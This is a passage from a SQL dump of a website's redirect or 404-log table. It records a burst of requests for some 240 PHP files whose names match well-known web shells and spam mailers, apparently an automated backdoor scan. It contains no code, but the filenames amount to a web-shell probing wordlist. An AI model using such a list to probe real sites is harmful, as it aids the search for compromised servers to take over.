13:13:48','0000-00-00 00:00:00'),(9664,'http://hallcrestheights.org/123.php',NULL,'','',1,0,'2017-05-25 13:13:49','0000-00-00 00:00:00'),(9665,'http://hallcrestheights.org/404.php',NULL,'','',3,0,'2017-05-25 13:13:50','0000-00-00 00:00:00'),(9666,'http://hallcrestheights.org/send.php',NULL,'','',1,0,'2017-05-25 13:12:30','0000-00-00 00:00:00'),(9667,'http://hallcrestheights.org/911.php',NULL,'','',1,0,'2017-05-25 13:13:51','0000-00-00 00:00:00'),(9668,'http://hallcrestheights.org/images/anon.php',NULL,'','',1,0,'2017-05-25 13:13:56','0000-00-00 00:00:00'),(9669,'http://hallcrestheights.org/bbb.php',NULL,'','',1,0,'2017-05-25 13:13:56','0000-00-00 00:00:00'),(9670,'http://hallcrestheights.org/c22.php',NULL,'','',1,0,'2017-05-25 13:13:57','0000-00-00 00:00:00'),(9671,'http://hallcrestheights.org/c99.php',NULL,'','',1,0,'2017-05-25 13:13:58','0000-00-00 00:00:00'),(9672,'http://hallcrestheights.org/cpn.php',NULL,'','',1,0,'2017-05-25 13:13:58','0000-00-00 00:00:00'),(9673,'http://hallcrestheights.org/images/guide.php',NULL,'','',1,0,'2017-05-25 13:12:39','0000-00-00 00:00:00'),(9674,'http://hallcrestheights.org/dam.php',NULL,'','',1,0,'2017-05-25 13:12:40','0000-00-00 00:00:00'),(9675,'http://hallcrestheights.org/dom.php',NULL,'','',1,0,'2017-05-25 13:14:01','0000-00-00 00:00:00'),(9676,'http://hallcrestheights.org/dz0.php',NULL,'','',1,0,'2017-05-25 13:14:01','0000-00-00 00:00:00'),(9677,'http://hallcrestheights.org/dz1.php',NULL,'','',1,0,'2017-05-25 13:14:02','0000-00-00 00:00:00'),(9678,'http://hallcrestheights.org/egy.php',NULL,'','',1,0,'2017-05-25 13:14:03','0000-00-00 00:00:00'),(9679,'http://hallcrestheights.org/hhh.php',NULL,'','',1,0,'2017-05-25 13:14:04','0000-00-00 00:00:00'),(9680,'http://hallcrestheights.org/ksa.php',NULL,'','',2,0,'2017-05-25 13:14:04','0000-00-00 00:00:00'),(9681,'http://hallcrestheights.org/L3b.php',NULL,'','',1,0,'2017-05-25 13:14:05','0000-00-00 00:00:00'),(9682,'http://hallcrestheights.org/nkr.php',NULL,'','',1,0,'2017-05-25 13:14:06','0000-00-00 00:00:00'),(9683,'http://hallcrestheights.org/oop.php',NULL,'','',1,0,'2017-05-25 13:12:47','0000-00-00 00:00:00'),(9684,'http://hallcrestheights.org/zdb.php',NULL,'','',1,0,'2017-05-25 13:12:47','0000-00-00 00:00:00'),(9685,'http://hallcrestheights.org/zebi.php',NULL,'','',1,0,'2017-05-25 13:12:49','0000-00-00 00:00:00'),(9686,'http://hallcrestheights.org/vsy.php',NULL,'','',1,0,'2017-05-25 13:14:09','0000-00-00 00:00:00'),(9687,'http://hallcrestheights.org/gino/404.php',NULL,'','',1,0,'2017-05-25 13:14:10','0000-00-00 00:00:00'),(9688,'http://hallcrestheights.org/gino/adminer.php',NULL,'','',1,0,'2017-05-25 13:12:50','0000-00-00 00:00:00'),(9689,'http://hallcrestheights.org/gino/awso.php',NULL,'','',1,0,'2017-05-25 13:14:11','0000-00-00 00:00:00'),(9690,'http://hallcrestheights.org/gino/bc.php',NULL,'','',1,0,'2017-05-25 13:14:12','0000-00-00 00:00:00'),(9691,'http://hallcrestheights.org/gino/fwso.php',NULL,'','',1,0,'2017-05-25 13:14:12','0000-00-00 00:00:00'),(9692,'http://hallcrestheights.org/gino/k.php',NULL,'','',1,0,'2017-05-25 13:12:52','0000-00-00 00:00:00'),(9693,'http://hallcrestheights.org/gino/mass.php',NULL,'','',1,0,'2017-05-25 13:12:53','0000-00-00 00:00:00'),(9694,'http://hallcrestheights.org/gino/oop.php',NULL,'','',1,0,'2017-05-25 13:14:14','0000-00-00 00:00:00'),(9695,'http://hallcrestheights.org/gino/passwd.php',NULL,'','',1,0,'2017-05-25 13:14:14','0000-00-00 00:00:00'),(9696,'http://hallcrestheights.org/gino/pws.php',NULL,'','',1,0,'2017-05-25 13:14:15','0000-00-00 00:00:00'),(9697,'http://hallcrestheights.org/gino/r00t.php',NULL,'','',1,0,'2017-05-25 13:14:16','0000-00-00 00:00:00'),(9698,'http://hallcrestheights.org/gino/symv4.php',NULL,'','',1,0,'2017-05-25 13:14:16','0000-00-00 00:00:00'),(9699,'http://hallcrestheights.org/gino/turbo.php',NULL,'','',1,0,'2017-05-25 13:14:17','0000-00-00 00:00:00'),(9700,'http://hallcrestheights.org/gino/upx.php',NULL,'','',1,0,'2017-05-25 13:12:58','0000-00-00 00:00:00'),(9701,'http://hallcrestheights.org/gino/newsr.php',NULL,'','',1,0,'2017-05-25 13:14:18','0000-00-00 00:00:00'),(9702,'http://hallcrestheights.org/gino/users.php',NULL,'','',1,0,'2017-05-25 13:14:19','0000-00-00 00:00:00'),(9703,'http://hallcrestheights.org/gino/wp-mailer.php',NULL,'','',1,0,'2017-05-25 13:14:20','0000-00-00 00:00:00'),(9704,'http://hallcrestheights.org/images/avu.php',NULL,'','',1,0,'2017-05-25 13:14:20','0000-00-00 00:00:00'),(9705,'http://hallcrestheights.org/r0k.php',NULL,'','',1,0,'2017-05-25 13:13:01','0000-00-00 00:00:00'),(9706,'http://hallcrestheights.org/cocot.php',NULL,'','',1,0,'2017-05-25 13:14:22','0000-00-00 00:00:00'),(9707,'http://hallcrestheights.org/indx.php',NULL,'','',1,0,'2017-05-25 13:14:23','0000-00-00 00:00:00'),(9708,'http://hallcrestheights.org/JI2BJ9.php',NULL,'','',1,0,'2017-05-25 13:14:23','0000-00-00 00:00:00'),(9709,'http://hallcrestheights.org/RvSEYZ.php',NULL,'','',1,0,'2017-05-25 13:13:04','0000-00-00 00:00:00'),(9710,'http://hallcrestheights.org/imdex.php',NULL,'','',7,0,'2017-05-25 13:14:25','0000-00-00 00:00:00'),(9711,'http://hallcrestheights.org/mary.php',NULL,'','',2,0,'2017-05-25 13:14:25','0000-00-00 00:00:00'),(9712,'http://hallcrestheights.org/UtCD4e.php',NULL,'','',1,0,'2017-05-25 13:14:26','0000-00-00 00:00:00'),(9713,'http://hallcrestheights.org/ZhTiSC.php',NULL,'','',1,0,'2017-05-25 13:14:27','0000-00-00 00:00:00'),(9714,'http://hallcrestheights.org/instoll.php',NULL,'','',1,0,'2017-05-25 13:14:27','0000-00-00 00:00:00'),(9715,'http://hallcrestheights.org/r1z.php',NULL,'','',1,0,'2017-05-25 13:14:28','0000-00-00 00:00:00'),(9716,'http://hallcrestheights.org/sa2.php',NULL,'','',1,0,'2017-05-25 13:13:08','0000-00-00 00:00:00'),(9717,'http://hallcrestheights.org/img/jvc.php',NULL,'','',1,0,'2017-05-25 13:14:30','0000-00-00 00:00:00'),(9718,'http://hallcrestheights.org/images/jvc.php',NULL,'','',1,0,'2017-05-25 13:14:30','0000-00-00 00:00:00'),(9719,'http://hallcrestheights.org/img/newsr.php',NULL,'','',1,0,'2017-05-25 13:14:31','0000-00-00 00:00:00'),(9720,'http://hallcrestheights.org/admin/newsr.php',NULL,'','',1,0,'2017-05-25 13:14:33','0000-00-00 00:00:00'),(9721,'http://hallcrestheights.org/images/newsr.php',NULL,'','',1,0,'2017-05-25 13:14:34','0000-00-00 00:00:00'),(9722,'http://hallcrestheights.org/himages/newsr.php',NULL,'','',1,0,'2017-05-25 13:14:35','0000-00-00 00:00:00'),(9723,'http://hallcrestheights.org/1211.php',NULL,'','',1,0,'2017-05-25 13:13:16','0000-00-00 00:00:00'),(9724,'http://hallcrestheights.org/good.php',NULL,'','',1,0,'2017-05-25 13:13:16','0000-00-00 00:00:00'),(9725,'http://hallcrestheights.org/sea.php',NULL,'','',1,0,'2017-05-25 13:14:37','0000-00-00 00:00:00'),(9726,'http://hallcrestheights.org/roots.php',NULL,'','',4,0,'2017-05-25 13:13:17','0000-00-00 00:00:00'),(9727,'http://hallcrestheights.org/sok.php',NULL,'','',1,0,'2017-05-25 13:14:38','0000-00-00 00:00:00'),(9728,'http://hallcrestheights.org/ok.php',NULL,'','',3,0,'2017-05-25 13:14:39','0000-00-00 00:00:00'),(9729,'http://hallcrestheights.org/default.php',NULL,'','',1,0,'2017-05-25 13:14:39','0000-00-00 00:00:00'),(9730,'http://hallcrestheights.org/sos.php',NULL,'','',1,0,'2017-05-25 13:13:20','0000-00-00 00:00:00'),(9731,'http://hallcrestheights.org/all-gahz.php',NULL,'','',1,0,'2017-05-25 13:14:43','0000-00-00 00:00:00'),(9732,'http://hallcrestheights.org/oss.php',NULL,'','',22,0,'2017-05-25 13:14:43','0000-00-00 00:00:00'),(9733,'http://hallcrestheights.org/wp-update.php',NULL,'','',1,0,'2017-05-25 13:14:44','0000-00-00 00:00:00'),(9734,'http://hallcrestheights.org/sender.php',NULL,'','',1,0,'2017-05-25 13:14:45','0000-00-00 00:00:00'),(9735,'http://hallcrestheights.org/config2.php',NULL,'','',1,0,'2017-05-25 13:14:45','0000-00-00 00:00:00'),(9736,'http://hallcrestheights.org/lean.php',NULL,'','',1,0,'2017-05-25 13:13:26','0000-00-00 00:00:00'),(9737,'http://hallcrestheights.org/phpmailer.php',NULL,'','',1,0,'2017-05-25 13:14:47','0000-00-00 00:00:00'),(9738,'http://hallcrestheights.org/md.php',NULL,'','',1,0,'2017-05-25 13:14:48','0000-00-00 00:00:00'),(9739,'http://hallcrestheights.org/sql.php',NULL,'','',1,0,'2017-05-25 13:14:48','0000-00-00 00:00:00'),(9740,'http://hallcrestheights.org/ssl.php',NULL,'','',1,0,'2017-05-25 13:13:29','0000-00-00 00:00:00'),(9741,'http://hallcrestheights.org/1337.php',NULL,'','',4,0,'2017-05-25 13:14:50','0000-00-00 00:00:00'),(9742,'http://hallcrestheights.org/Sym.php',NULL,'','',1,0,'2017-05-25 13:14:50','0000-00-00 00:00:00'),(9743,'http://hallcrestheights.org/t00.php',NULL,'','',1,0,'2017-05-25 13:13:31','0000-00-00 00:00:00'),(9744,'http://hallcrestheights.org/tmp.php',NULL,'','',110,0,'2017-05-25 13:13:31','0000-00-00 00:00:00'),(9745,'http://hallcrestheights.org/xai.php',NULL,'','',1,0,'2017-05-25 13:14:53','0000-00-00 00:00:00'),(9746,'http://hallcrestheights.org/xxx.php',NULL,'','',1,0,'2017-05-25 13:14:53','0000-00-00 00:00:00'),(9747,'http://hallcrestheights.org/abcd.php',NULL,'','',1,0,'2017-05-25 13:14:54','0000-00-00 00:00:00'),(9748,'http://hallcrestheights.org/0day.php',NULL,'','',1,0,'2017-05-25 13:14:55','0000-00-00 00:00:00'),(9749,'http://hallcrestheights.org/crypto.php',NULL,'','',1,0,'2017-05-25 13:14:56','0000-00-00 00:00:00'),(9750,'http://hallcrestheights.org/1234.php',NULL,'','',1,0,'2017-05-25 13:14:56','0000-00-00 00:00:00'),(9751,'http://hallcrestheights.org/amad.php',NULL,'','',1,0,'2017-05-25 13:14:57','0000-00-00 00:00:00'),(9752,'http://hallcrestheights.org/xup.php',NULL,'','',26,0,'2017-05-25 13:13:37','0000-00-00 00:00:00'),(9753,'http://hallcrestheights.org/b374.php',NULL,'','',1,0,'2017-05-25 13:14:58','0000-00-00 00:00:00'),(9754,'http://hallcrestheights.org/c100.php',NULL,'','',1,0,'2017-05-25 13:13:39','0000-00-00 00:00:00'),(9755,'http://hallcrestheights.org/d4rk.php',NULL,'','',1,0,'2017-05-25 13:15:00','0000-00-00 00:00:00'),(9756,'http://hallcrestheights.org/fuck.php',NULL,'','',1,0,'2017-05-25 13:15:00','0000-00-00 00:00:00'),(9757,'http://hallcrestheights.org/405.php',NULL,'','',1,0,'2017-05-25 13:13:41','0000-00-00 00:00:00'),(9758,'http://hallcrestheights.org/drupal.php',NULL,'','',2,0,'2017-05-25 13:15:01','0000-00-00 00:00:00'),(9759,'http://hallcrestheights.org/azshell.php',NULL,'','',1,0,'2017-05-25 13:15:02','0000-00-00 00:00:00'),(9760,'http://hallcrestheights.org/gaza.php',NULL,'','',1,0,'2017-05-25 13:13:42','0000-00-00 00:00:00'),(9761,'http://hallcrestheights.org/info.php',NULL,'','',31,0,'2017-05-25 13:15:03','0000-00-00 00:00:00'),(9762,'http://hallcrestheights.org/king.php',NULL,'','',1,0,'2017-05-25 13:15:04','0000-00-00 00:00:00'),(9763,'http://hallcrestheights.org/msss.php',NULL,'','',1,0,'2017-05-25 13:15:04','0000-00-00 00:00:00'),(9764,'http://hallcrestheights.org/mail.php',NULL,'','',1,0,'2017-05-25 13:13:45','0000-00-00 00:00:00'),(9765,'http://hallcrestheights.org/mailer.php',NULL,'','',2,0,'2017-05-25 13:15:05','0000-00-00 00:00:00'),(9766,'http://hallcrestheights.org/inbox.php',NULL,'','',1,0,'2017-05-25 13:13:45','0000-00-00 00:00:00'),(9767,'http://hallcrestheights.org/spam.php',NULL,'','',1,0,'2017-05-25 13:15:07','0000-00-00 00:00:00'),(9768,'http://hallcrestheights.org/smtp.php',NULL,'','',1,0,'2017-05-25 13:15:08','0000-00-00 00:00:00'),(9769,'http://hallcrestheights.org/mm.php',NULL,'','',1,0,'2017-05-25 13:15:09','0000-00-00 00:00:00'),(9770,'http://hallcrestheights.org/okay.php',NULL,'','',1,0,'2017-05-25 13:15:09','0000-00-00 00:00:00'),(9771,'http://hallcrestheights.org/priv.php',NULL,'','',1,0,'2017-05-25 13:15:10','0000-00-00 00:00:00'),(9772,'http://hallcrestheights.org/r00t.php',NULL,'','',1,0,'2017-05-25 13:13:50','0000-00-00 00:00:00'),(9773,'http://hallcrestheights.org/tki.php',NULL,'','',1,0,'2017-05-25 13:15:12','0000-00-00 00:00:00'),(9774,'http://hallcrestheights.org/root.php',NULL,'','',1,0,'2017-05-25 13:15:13','0000-00-00 00:00:00'),(9775,'http://hallcrestheights.org/rr57.php',NULL,'','',1,0,'2017-05-25 13:15:14','0000-00-00 00:00:00'),(9776,'http://hallcrestheights.org/sado.php',NULL,'','',1,0,'2017-05-25 13:15:18','0000-00-00 00:00:00'),(9777,'http://hallcrestheights.org/libraries/legacy/log/leaf.php',NULL,'','',1,0,'2017-05-25 13:15:19','0000-00-00 00:00:00'),(9778,'http://hallcrestheights.org/term.php',NULL,'','',1,0,'2017-05-25 13:15:19','0000-00-00 00:00:00'),(9779,'http://hallcrestheights.org/user.php',NULL,'','',2,0,'2017-05-25 13:14:00','0000-00-00 00:00:00'),(9780,'http://hallcrestheights.org/web1.php',NULL,'','',1,0,'2017-05-25 13:15:21','0000-00-00 00:00:00'),(9781,'http://hallcrestheights.org/WolF.php',NULL,'','',1,0,'2017-05-25 13:15:22','0000-00-00 00:00:00'),(9782,'http://hallcrestheights.org/hajj.php',NULL,'','',1,0,'2017-05-25 13:15:24','0000-00-00 00:00:00'),(9783,'http://hallcrestheights.org/zaco.php',NULL,'','',1,0,'2017-05-25 13:15:24','0000-00-00 00:00:00'),(9784,'http://hallcrestheights.org/seo.php.php',NULL,'','',1,0,'2017-05-25 13:15:26','0000-00-00 00:00:00'),(9785,'http://hallcrestheights.org/3tr.php',NULL,'','',1,0,'2017-05-25 13:14:06','0000-00-00 00:00:00'),(9786,'http://hallcrestheights.org/maskamal.php',NULL,'','',1,0,'2017-05-25 13:15:27','0000-00-00 00:00:00'),(9787,'http://hallcrestheights.org/4ever.php',NULL,'','',1,0,'2017-05-25 13:15:27','0000-00-00 00:00:00'),(9788,'http://hallcrestheights.org/angel.php',NULL,'','',1,0,'2017-05-25 13:15:28','0000-00-00 00:00:00'),(9789,'http://hallcrestheights.org/b374k.php',NULL,'','',1,0,'2017-05-25 13:14:08','0000-00-00 00:00:00'),(9790,'http://hallcrestheights.org/vvv.php',NULL,'','',1,0,'2017-05-25 13:15:30','0000-00-00 00:00:00'),(9791,'http://hallcrestheights.org/Black.php',NULL,'','',1,0,'2017-05-25 13:15:31','0000-00-00 00:00:00'),(9792,'http://hallcrestheights.org/Jcznam.php',NULL,'','',1,0,'2017-05-25 13:15:32','0000-00-00 00:00:00'),(9793,'http://hallcrestheights.org/bluff.php',NULL,'','',1,0,'2017-05-25 13:15:34','0000-00-00 00:00:00'),(9794,'http://hallcrestheights.org/baws.php',NULL,'','',13,0,'2017-05-25 13:15:35','0000-00-00 00:00:00'),(9795,'http://hallcrestheights.org/cyber.php',NULL,'','',1,0,'2017-05-25 13:15:35','0000-00-00 00:00:00'),(9796,'http://hallcrestheights.org/M4r0c.php',NULL,'','',1,0,'2017-05-25 13:15:36','0000-00-00 00:00:00'),(9797,'http://hallcrestheights.org/mysql.php',NULL,'','',1,0,'2017-05-25 13:15:36','0000-00-00 00:00:00'),(9798,'http://hallcrestheights.org/priv8.php',NULL,'','',1,0,'2017-05-25 13:15:37','0000-00-00 00:00:00'),(9799,'http://hallcrestheights.org/sabun.php',NULL,'','',1,0,'2017-05-25 13:15:38','0000-00-00 00:00:00'),(9800,'http://hallcrestheights.org/sadom.php',NULL,'','',1,0,'2017-05-25 13:15:38','0000-00-00 00:00:00'),(9801,'http://hallcrestheights.org/Sh3ll.php',NULL,'','',1,0,'2017-05-25 13:14:19','0000-00-00 00:00:00'),(9802,'http://hallcrestheights.org/tmp/2.php',NULL,'','',1,0,'2017-05-25 13:15:41','0000-00-00 00:00:00'),(9803,'http://hallcrestheights.org/tmp/d.php',NULL,'','',1,0,'2017-05-25 13:15:41','0000-00-00 00:00:00'),(9804,'http://hallcrestheights.org/tmp/w.php',NULL,'','',1,0,'2017-05-25 13:15:42','0000-00-00 00:00:00'),(9805,'http://hallcrestheights.org/whmcs.php',NULL,'','',1,0,'2017-05-25 13:15:42','0000-00-00 00:00:00'),(9806,'http://hallcrestheights.org/x2300.php',NULL,'','',1,0,'2017-05-25 13:15:43','0000-00-00 00:00:00'),(9807,'http://hallcrestheights.org/admin1.php',NULL,'','',1,0,'2017-05-25 13:14:23','0000-00-00 00:00:00'),(9808,'http://hallcrestheights.org/dr.php',NULL,'','',1,0,'2017-05-25 13:15:44','0000-00-00 00:00:00'),(9809,'http://hallcrestheights.org/alf2.php',NULL,'','',1,0,'2017-05-25 13:15:45','0000-00-00 00:00:00'),(9810,'http://hallcrestheights.org/b347k.php',NULL,'','',1,0,'2017-05-25 13:15:45','0000-00-00 00:00:00'),(9811,'http://hallcrestheights.org/admins.php',NULL,'','',1,0,'2017-05-25 13:14:25','0000-00-00 00:00:00'),(9812,'http://hallcrestheights.org/alucar.php',NULL,'','',1,0,'2017-05-25 13:14:26','0000-00-00 00:00:00'),(9813,'http://hallcrestheights.org/cpanel.php',NULL,'','',1,0,'2017-05-25 13:14:27','0000-00-00 00:00:00'),(9814,'http://hallcrestheights.org/xp.php',NULL,'','',1,0,'2017-05-25 13:15:48','0000-00-00 00:00:00'),(9815,'http://hallcrestheights.org/0x.php',NULL,'','',1,0,'2017-05-25 13:15:48','0000-00-00 00:00:00'),(9816,'http://hallcrestheights.org/indo.php',NULL,'','',2,0,'2017-05-25 13:15:49','0000-00-00 00:00:00'),(9817,'http://hallcrestheights.org/ekinox.php',NULL,'','',1,0,'2017-05-25 13:15:50','0000-00-00 00:00:00'),(9818,'http://hallcrestheights.org/hacked.php',NULL,'','',1,0,'2017-05-25 13:15:50','0000-00-00 00:00:00'),(9819,'http://hallcrestheights.org/hacker.php',NULL,'','',1,0,'2017-05-25 13:15:51','0000-00-00 00:00:00'),(9820,'http://hallcrestheights.org/index1.php',NULL,'','',3,0,'2017-05-25 13:14:32','0000-00-00 00:00:00'),(9821,'http://hallcrestheights.org/hgmsky.php',NULL,'','',1,0,'2017-05-25 13:15:52','0000-00-00 00:00:00'),(9822,'http://hallcrestheights.org/fatalux.php',NULL,'','',1,0,'2017-05-25 13:15:53','0000-00-00 00:00:00'),(9823,'http://hallcrestheights.org/noob.php',NULL,'','',1,0,'2017-05-25 13:15:54','0000-00-00 00:00:00'),(9824,'http://hallcrestheights.org/PoisonShell.php',NULL,'','',1,0,'2017-05-25 13:15:56','0000-00-00 00:00:00'),(9825,'http://hallcrestheights.org/images/readme.php',NULL,'','',1,0,'2017-05-25 13:14:36','0000-00-00 00:00:00'),(9826,'http://hallcrestheights.org/images/style-js.php',NULL,'','',1,0,'2017-05-25 13:14:37','0000-00-00 00:00:00'),(9827,'http://hallcrestheights.org/killer.php',NULL,'','',1,0,'2017-05-25 13:14:38','0000-00-00 00:00:00'),(9828,'http://hallcrestheights.org/noname.php',NULL,'','',1,0,'2017-05-25 13:15:59','0000-00-00 00:00:00'),(9829,'http://hallcrestheights.org/moa.php',NULL,'','',1,0,'2017-05-25 13:16:00','0000-00-00 00:00:00'),(9830,'http://hallcrestheights.org/xax.php',NULL,'','',1,0,'2017-05-25 13:14:40','0000-00-00 00:00:00'),(9831,'http://hallcrestheights.org/Wm.php',NULL,'','',1,0,'2017-05-25 13:14:41','0000-00-00 00:00:00'),(9832,'http://hallcrestheights.org/confiq.php',NULL,'','',1,0,'2017-05-25 13:16:03','0000-00-00 00:00:00'),(9833,'http://hallcrestheights.org/shellwow.php',NULL,'','',1,0,'2017-05-25 13:16:03','0000-00-00 00:00:00'),(9834,'http://hallcrestheights.org/Server.php',NULL,'','',1,0,'2017-05-25 13:16:04','0000-00-00 00:00:00'),(9835,'http://hallcrestheights.org/sniper.php',NULL,'','',1,0,'2017-05-25 13:16:04','0000-00-00 00:00:00'),(9836,'http://hallcrestheights.org/tmp/as.php',NULL,'','',1,0,'2017-05-25 13:16:05','0000-00-00 00:00:00'),(9837,'http://hallcrestheights.org/tmp/dz.php',NULL,'','',1,0,'2017-05-25 13:16:06','0000-00-00 00:00:00'),(9838,'http://hallcrestheights.org/tmp/sa.php',NULL,'','',1,0,'2017-05-25 13:14:46','0000-00-00 00:00:00'),(9839,'http://hallcrestheights.org/tmp/ss.php',NULL,'','',1,0,'2017-05-25 13:16:07','0000-00-00 00:00:00'),(9840,'http://hallcrestheights.org/tmp/up.php',NULL,'','',1,0,'2017-05-25 13:16:07','0000-00-00 00:00:00'),(9841,'http://hallcrestheights.org/tmp/pz.php',NULL,'','',29,0,'2017-05-25 13:16:08','0000-00-00 00:00:00'),(9842,'http://hallcrestheights.org/tmp/xd.php',NULL,'','',1,0,'2017-05-25 13:16:08','0000-00-00 00:00:00'),(9843,'http://hallcrestheights.org/upload.php',NULL,'','',2,0,'2017-05-25 13:14:49','0000-00-00 00:00:00'),(9844,'http://hallcrestheights.org/cgi.php',NULL,'','',5,0,'2017-05-25 13:16:10','0000-00-00 00:00:00'),(9845,'http://hallcrestheights.org/SymlinkSa3.0.php',NULL,'','',1,0,'2017-05-25 13:16:10','0000-00-00 00:00:00'),(9846,'http://hallcrestheights.org/v4team.php',NULL,'','',1,0,'2017-05-25 13:16:13','0000-00-00 00:00:00'),(9847,'http://hallcrestheights.org/j2.php',NULL,'','',1,0,'2017-05-25 13:16:13','0000-00-00 00:00:00'),(9848,'http://hallcrestheights.org/spad.php',NULL,'','',1,0,'2017-05-25 13:16:14','0000-00-00 00:00:00'),(9849,'http://hallcrestheights.org/zone-h.php',NULL,'','',1,0,'2017-05-25 13:14:55','0000-00-00 00:00:00'),(9850,'http://hallcrestheights.org/bighatz.php',NULL,'','',1,0,'2017-05-25 13:16:17','0000-00-00 00:00:00'),(9851,'http://hallcrestheights.org/d0maine.php',NULL,'','',1,0,'2017-05-25 13:16:18','0000-00-00 00:00:00'),(9852,'http://hallcrestheights.org/d0mains.php',NULL,'','',1,0,'2017-05-25 13:16:18','0000-00-00 00:00:00'),(9853,'http://hallcrestheights.org/bestshell.php',NULL,'','',1,0,'2017-05-25 13:16:19','0000-00-00 00:00:00'),(9854,'http://hallcrestheights.org/domains.php',NULL,'','',1,0,'2017-05-25 13:16:19','0000-00-00 00:00:00'),(9855,'http://hallcrestheights.org/madspot.php',NULL,'','',1,0,'2017-05-25 13:16:20','0000-00-00 00:00:00'),(9856,'http://hallcrestheights.org/myshell.php',NULL,'','',1,0,'2017-05-25 13:16:22','0000-00-00 00:00:00'),(9857,'http://hallcrestheights.org/offline.php',NULL,'','',1,0,'2017-05-25 13:16:23','0000-00-00 00:00:00'),(9858,'http://hallcrestheights.org/Sec-War.php',NULL,'','',1,0,'2017-05-25 13:15:04','0000-00-00 00:00:00'),(9859,'http://hallcrestheights.org/sheller.php',NULL,'','',1,0,'2017-05-25 13:16:24','0000-00-00 00:00:00'),(9860,'http://hallcrestheights.org/sql-new.php',NULL,'','',1,0,'2017-05-25 13:16:25','0000-00-00 00:00:00'),(9861,'http://hallcrestheights.org/tmp/cpn.php',NULL,'','',1,0,'2017-05-25 13:16:27','0000-00-00 00:00:00'),(9862,'http://hallcrestheights.org/tmp/dz1.php',NULL,'','',1,0,'2017-05-25 13:16:28','0000-00-00 00:00:00'),(9863,'http://hallcrestheights.org/tmp/L3b.php',NULL,'','',1,0,'2017-05-25 13:16:29','0000-00-00 00:00:00'),(9864,'http://hallcrestheights.org/tmp/r1z.php',NULL,'','',1,0,'2017-05-25 13:16:29','0000-00-00 00:00:00'),(9865,'http://hallcrestheights.org/tmp/sok.php',NULL,'','',1,0,'2017-05-25 13:16:30','0000-00-00 00:00:00'),(9866,'http://hallcrestheights.org/tmp/sql.php',NULL,'','',1,0,'2017-05-25 13:16:33','0000-00-00 00:00:00'),(9867,'http://hallcrestheights.org/tmp/Sym.php',NULL,'','',1,0,'2017-05-25 13:16:33','0000-00-00 00:00:00'),(9868,'http://hallcrestheights.org/uploads.php',NULL,'','',1,0,'2017-05-25 13:16:34','0000-00-00 00:00:00'),(9869,'http://hallcrestheights.org/webr00t.php',NULL,'','',1,0,'2017-05-25 13:16:34','0000-00-00 00:00:00'),(9870,'http://hallcrestheights.org/abuhlail.php',NULL,'','',1,0,'2017-05-25 13:15:15','0000-00-00 00:00:00'),(9871,'http://hallcrestheights.org/bugshell.php',NULL,'','',1,0,'2017-05-25 13:15:15','0000-00-00 00:00:00'),(9872,'http://hallcrestheights.org/Cgishell.php',NULL,'','',1,0,'2017-05-25 13:16:36','0000-00-00 00:00:00'),(9873,'http://hallcrestheights.org/database.php',NULL,'','',2,0,'2017-05-25 13:16:37','0000-00-00 00:00:00'),(9874,'http://hallcrestheights.org/egyshell.php',NULL,'','',1,0,'2017-05-25 13:16:37','0000-00-00 00:00:00'),(9875,'http://hallcrestheights.org/images/2.php',NULL,'','',4,0,'2017-05-25 13:16:38','0000-00-00 00:00:00'),(9876,'http://hallcrestheights.org/images/b.php',NULL,'','',1,0,'2017-05-25 13:16:39','0000-00-00 00:00:00'),(9877,'http://hallcrestheights.org/images/c.php',NULL,'','',1,0,'2017-05-25 13:16:40','0000-00-00 00:00:00'),(9878,'http://hallcrestheights.org/images/d.php',NULL,'','',1,0,'2017-05-25 13:16:40','0000-00-00 00:00:00'),(9879,'http://hallcrestheights.org/images/g.php',NULL,'','',1,0,'2017-05-25 13:16:41','0000-00-00 00:00:00'),(9880,'http://hallcrestheights.org/images/k.php',NULL,'','',1,0,'2017-05-25 13:16:41','0000-00-00 00:00:00'),(9881,'http://hallcrestheights.org/images/m.php',NULL,'','',1,0,'2017-05-25 13:16:42','0000-00-00 00:00:00'),(9882,'http://hallcrestheights.org/images/X.php',NULL,'','',1,0,'2017-05-25 13:16:42','0000-00-00 00:00:00'),(9883,'http://hallcrestheights.org/r00t-s3c.php',NULL,'','',1,0,'2017-05-25 13:16:43','0000-00-00 00:00:00'),(9884,'http://hallcrestheights.org/sadrazam.php',NULL,'','',1,0,'2017-05-25 13:16:43','0000-00-00 00:00:00'),(9885,'http://hallcrestheights.org/symlink1.php',NULL,'','',1,0,'2017-05-25 13:16:44','0000-00-00 00:00:00'),(9886,'http://hallcrestheights.org/sysadmin.php',NULL,'','',1,0,'2017-05-25 13:16:45','0000-00-00 00:00:00'),(9887,'http://hallcrestheights.org/tmp/king.php',NULL,'','',1,0,'2017-05-25 13:16:46','0000-00-00 00:00:00'),(9888,'http://hallcrestheights.org/tmp/r00t.php',NULL,'','',1,0,'2017-05-25 13:16:46','0000-00-00 00:00:00'),(9889,'http://hallcrestheights.org/tmp/root.php',NULL,'','',1,0,'2017-05-25 13:16:47','0000-00-00 00:00:00'),(9890,'http://hallcrestheights.org/tmp/user.php',NULL,'','',2,0,'2017-05-25 13:15:27','0000-00-00 00:00:00'),(9891,'http://hallcrestheights.org/tmp/vaga.php',NULL,'','',1,0,'2017-05-25 13:16:47','0000-00-00 00:00:00'),(9892,'http://hallcrestheights.org/turkcrew.php',NULL,'','',1,0,'2017-05-25 13:16:48','0000-00-00 00:00:00'),(9893,'http://hallcrestheights.org/1n73ction.php',NULL,'','',1,0,'2017-05-25 13:16:49','0000-00-00 00:00:00'),(9894,'http://hallcrestheights.org/changeall.php',NULL,'','',1,0,'2017-05-25 13:16:49','0000-00-00 00:00:00'),(9895,'http://hallcrestheights.org/images//2.php',NULL,'','',1,0,'2017-05-25 13:16:50','0000-00-00 00:00:00'),(9896,'http://hallcrestheights.org/images/cp.php',NULL,'','',1,0,'2017-05-25 13:16:50','0000-00-00 00:00:00'),(9897,'http://hallcrestheights.org/images/DZ.php',NULL,'','',1,0,'2017-05-25 13:15:31','0000-00-00 00:00:00'),(9898,'http://hallcrestheights.org/images/ls.php',NULL,'','',1,0,'2017-05-25 13:16:52','0000-00-00 00:00:00'),(9899,'http://hallcrestheights.org/images/sa.php',NULL,'','',1,0,'2017-05-25 13:16:52','0000-00-00 00:00:00'),(9900,'http://hallcrestheights.org/images/up.php',NULL,'','',1,0,'2017-05-25 13:16:53','0000-00-00 00:00:00'),(9901,'http://hallcrestheights.org/images/wp.php',NULL,'','',1,0,'2017-05-25 13:16:53','0000-00-00 00:00:00'),(9902,'http://hallcrestheights.org/images/mm5mm.php',NULL,'','',1,0,'2017-05-25 13:16:54','0000-00-00 